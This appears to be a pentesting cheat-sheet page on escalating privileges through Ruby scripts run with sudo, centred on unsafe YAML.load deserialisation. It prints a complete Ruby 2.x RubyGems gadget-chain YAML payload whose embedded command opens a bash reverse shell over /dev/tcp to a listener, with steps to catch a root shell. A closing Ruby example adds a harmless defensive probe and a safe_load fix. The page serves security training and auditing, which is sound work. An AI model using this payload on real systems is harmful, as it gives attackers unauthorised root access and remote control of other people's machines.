Ruby
Theory
Ruby scripts are widely used by system administrators and developers to automate tasks on Unix-like systems, and they are often granted elevated rights through sudo. A script that runs as root but trusts input an unprivileged user controls (a file it reads, an environment variable, a library it loads) can become a privilege escalation path; deserialising attacker-controlled YAML is one such issue and is the case covered below.
Practice
YAML Code Execution
Assume the script can be executed as root through sudo. If it deserialises a file we control with YAML.load or YAML.load_file, the script is vulnerable to arbitrary code execution: with Psych 3 (the YAML library bundled with Ruby up to 3.0) those loaders instantiate any class named in a !ruby/object tag, and a chain of RubyGems and Net::HTTP objects can be assembled that ends in Kernel#system. File.read by itself is harmless; what matters is where its result goes. Since Psych 4 (Ruby 3.1) YAML.load is safe by default and the old behaviour has moved to YAML.unsafe_load, so check the target's ruby -v as well as the code.
sudo -l
(root) /usr/bin/ruby sample.rb
Check whether we control the input of the vulnerable call, for example a sample.rb that does:
YAML.load(File.read('sample.yml'))
If we can write sample.yml (or control the directory a relative path is resolved from), we can inject arbitrary objects. Here is an example of a malicious sample.yml, the well-known universal deserialization gadget chain for Ruby 2.x: Gem::RequestSet#resolve appends git_set to sets, the Net::WriteAdapter forwards that string to Kernel.system, and the command runs as root:
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
         method_id: :resolve
Start a listener on <local-ip>:<local-port> (for example nc -lvnp <local-port>), then run sudo /usr/bin/ruby sample.rb; the shell that connects back runs as root. The chain depends on the internal layout of RubyGems and Net::HTTP in the Ruby 2.x series and on an unsafe YAML.load, so confirm the target's Ruby and Psych versions before relying on it.
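As an added example (not code from the original page), the following Ruby shows both sides of the check above: the unsafe loader pattern that makes a script like sample.rb exploitable, the safe_load replacement that refuses tagged objects, and a probe that reports whether the interpreter's bare YAML.load is the unsafe one. ScriptConfig and the tagged document are constructed here in place of the gadget chain so the script runs harmlessly; run the probe with the same ruby binary that sudo would execute.

```ruby
require 'yaml'

# Stand-in class for whatever the audited script deserialises; constructed
# for this example so the demonstration builds a harmless object instead of
# the RubyGems gadget chain.
class ScriptConfig
  attr_reader :name
end

# Constructed attacker-controlled input: a document carrying a !ruby/object
# tag, the same mechanism the gadget chain relies on.
TAGGED_YAML = "--- !ruby/object:ScriptConfig\nname: injected\n".freeze

# The vulnerable pattern (what sample.rb effectively does): file content
# handed to the arbitrary-object loader. On Psych < 4 (Ruby <= 3.0) that
# loader is plain YAML.load; on Psych >= 4 the same behaviour is spelled
# YAML.unsafe_load, so both are covered here.
def load_unsafe(yaml)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(yaml) : YAML.load(yaml)
end

# Hardened form: only scalars, arrays and hashes come back unless a class is
# explicitly allow-listed, and aliases stay disabled so anchor tricks fail too.
def load_safe(yaml, permitted: [])
  YAML.safe_load(yaml, permitted_classes: permitted, aliases: false)
end

# true when the hardened loader refuses the document because it names a
# class outside the allow-list (Psych raises Psych::DisallowedClass).
def safe_load_rejects?(yaml)
  load_safe(yaml)
  false
rescue Psych::DisallowedClass
  true
end

# Audit probe: does this interpreter's bare YAML.load build arbitrary objects?
# true on Psych 3 (Ruby <= 3.0), false from Psych 4 (Ruby 3.1) onwards.
def yaml_load_unsafe?
  YAML.load(TAGGED_YAML).is_a?(ScriptConfig)
rescue Psych::DisallowedClass
  false
end

if __FILE__ == $PROGRAM_NAME
  obj = load_unsafe(TAGGED_YAML)
  puts "unsafe loader built a #{obj.class} with name=#{obj.name.inspect}"
  puts "safe_load rejected the tagged document: #{safe_load_rejects?(TAGGED_YAML)}"
  puts "Psych #{Psych::VERSION}: bare YAML.load is #{yaml_load_unsafe? ? 'UNSAFE' : 'safe'}"
end
```

When auditing a sudo-able script, grep it for YAML.load, YAML.load_file and YAML.unsafe_load and check the Psych version with the probe; when fixing it, replace the call with safe_load and an explicit permitted_classes list rather than relying on the interpreter version.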